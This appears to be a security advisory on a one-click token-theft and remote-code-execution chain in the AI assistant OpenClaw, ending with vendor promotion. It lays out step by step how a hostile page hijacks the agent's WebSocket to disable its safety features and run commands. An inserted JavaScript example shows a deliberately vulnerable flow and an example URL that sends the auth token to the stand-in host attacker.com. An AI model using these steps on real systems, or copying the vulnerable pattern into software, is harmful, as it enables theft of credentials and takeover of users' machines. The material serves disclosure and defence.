A critical vulnerability in the popular AI assistant Moltbot (now OpenClaw) allows attackers to steal authentication tokens and execute remote code with a single click, affecting over 100,000 developers.
A critical security vulnerability has been discovered in Moltbot (now OpenClaw), the popular open-source AI personal assistant trusted by over 100,000 developers. The vulnerability allows attackers to execute remote code on victims' machines with a single click, potentially exposing sensitive data including iMessage, WhatsApp, Slack access, and Stripe API keys.
The Vulnerability Chain
The security flaw was first identified by depthfirst's General Security Intelligence system, which mapped the application's data flow to uncover a dangerous logic gap. The vulnerability chain works as follows:
- URL Parameter Injection: the application's `app-settings.ts` blindly accepts a `gatewayUrl` query parameter from the URL and persists it to storage without validation
- Immediate Connection: `app-lifecycle.ts` triggers `connectGateway()` immediately after settings are applied, establishing a connection to the attacker-controlled gateway
- Token Leakage: `gateway.ts` automatically bundles the security-sensitive `authToken` into the connection handshake to the new gateway
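The following is an added illustration, not OpenClaw's own code: it reconstructs the logic gap in the three steps above (accept `gatewayUrl` from the query string, persist it, connect at once with the token in the handshake) beside a hardened version of the same flow. The function names, the settings store, the token value and the `confirm` callback (standing in for a user confirmation prompt, in the spirit of the modal described later in the article) are all assumptions made for the example, and the environment is constructed so it runs offline.

```javascript
// Added example (not OpenClaw's code): vulnerable gatewayUrl handling beside a
// hardened version. Names, storage and token value are assumptions.

const DEFAULT_GATEWAY = "ws://localhost:18789";   // default server named in the article
const AUTH_TOKEN = "tok_constructed_example";     // constructed stand-in, not a real token

// Constructed offline environment: a Map for settings storage and a list that
// records every handshake that would have gone over the wire.
function makeEnv() {
  const sent = [];
  return {
    storage: new Map(),
    sent,
    openSocket(gatewayUrl, payload) { sent.push({ gatewayUrl, payload }); },
  };
}

// --- Vulnerable flow (mirrors the chain in the article) ---------------------
function vulnerableConnectGateway(env) {
  const gatewayUrl = env.storage.get("gatewayUrl") || DEFAULT_GATEWAY;
  // The authToken is bundled into the handshake to whatever URL is stored.
  env.openSocket(gatewayUrl, { type: "connect", authToken: AUTH_TOKEN });
  return gatewayUrl;
}

function vulnerableApplyQuery(env, href) {
  const gatewayUrl = new URL(href).searchParams.get("gatewayUrl");
  if (gatewayUrl) env.storage.set("gatewayUrl", gatewayUrl); // persisted, no validation
  return vulnerableConnectGateway(env);                        // connects immediately
}

// --- Hardened flow ----------------------------------------------------------
const LOOPBACK_HOSTS = new Set(["localhost", "127.0.0.1", "[::1]"]);

// Only ws:/wss: URLs, no embedded credentials, and plaintext ws: only to loopback.
function isAcceptableGatewayUrl(raw) {
  let u;
  try { u = new URL(raw); } catch { return false; }
  if (u.protocol !== "ws:" && u.protocol !== "wss:") return false;
  if (u.username || u.password) return false;
  if (u.protocol === "ws:" && !LOOPBACK_HOSTS.has(u.hostname)) return false;
  return true;
}

// `confirm(url)` models the user prompt: it must return true before a new
// gateway URL is persisted or connected to, so the token never reaches an
// endpoint the user did not explicitly accept.
function hardenedApplyQuery(env, href, confirm) {
  const requested = new URL(href).searchParams.get("gatewayUrl");
  const current = env.storage.get("gatewayUrl") || DEFAULT_GATEWAY;
  if (requested === null || requested === current) {
    return { accepted: false, reason: "no change" };
  }
  if (!isAcceptableGatewayUrl(requested)) {
    return { accepted: false, reason: "rejected by validation" };
  }
  if (!confirm(requested)) {
    return { accepted: false, reason: "declined by user" };
  }
  env.storage.set("gatewayUrl", requested);
  env.openSocket(requested, { type: "connect", authToken: AUTH_TOKEN });
  return { accepted: true, reason: "confirmed" };
}
```

Run with the page's own URL, `http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080`, the vulnerable flow records a handshake carrying the token to `ws://attacker.com:8080`, while the hardened flow rejects the value before it is stored and never opens a socket. The validation step alone is not enough in the general case (a `wss://` URL on the public internet passes it), which is why the confirmation step still gates every change.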
The 1-Click Exploit
Mav Levin, Founding Security Researcher at depthfirst, chained this vulnerability with a WebSocket origin validation bypass to create a complete 1-Click RCE exploit:
- Victim visits malicious site: attacker.com loads JavaScript that opens a hidden window to `http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080`
- Token theft: the attacker's WebSocket server receives the victim's authentication token in the handshake
- Local connection bypass: JavaScript pivots through the victim's browser to connect to `ws://localhost:18789` (the default OpenClaw server), authenticating with the stolen token
- Sandbox escape: API requests disable safety features and container restrictions
- Code execution: a final `node.invoke` request executes arbitrary commands on the victim's machine
Once the victim has loaded the attacker's page, the entire chain executes in milliseconds with no further user interaction and no approval prompts.
Technical Details
The vulnerability exploits several security gaps:
- Same-origin policy bypass: the same-origin policy stops a page from reading cross-origin HTTP responses, but it does not apply to WebSocket handshakes; the browser sends an `Origin` header and leaves enforcement to the server, and OpenClaw's WebSocket server failed to validate it
- Cross-Site WebSocket Hijacking (CSWSH): because of that missing check, a page on attacker.com can open a WebSocket to the victim's localhost through the victim's own browser
- API privilege abuse: the stolen token carries the `operator.admin` and `operator.approvals` scopes, so the attacker can simply turn safety features off through the API rather than having to break out of the sandbox implementation itself
Patch and Disclosure
The OpenClaw team addressed the issue quickly, releasing a patch that adds a gateway URL confirmation modal to prevent auto-connection without user prompt. All versions up to v2026.1.24-1 are vulnerable.
Users are advised to:
- Upgrade to the latest version immediately
- Rotate authentication tokens if compromise is suspected
- Review security configurations for AI assistants with elevated permissions
This vulnerability highlights the critical security risks when granting AI agents "god mode" permissions over personal and professional digital assets. The combination of logic flaws, insufficient input validation, and overly permissive API scopes created a perfect storm for exploitation.
For developers shipping code, depthfirst offers automated security intelligence to catch these logic flaws before attackers can exploit them. The company is building tools to map application lifecycles and identify dangerous data flow patterns that traditional security scans might miss.
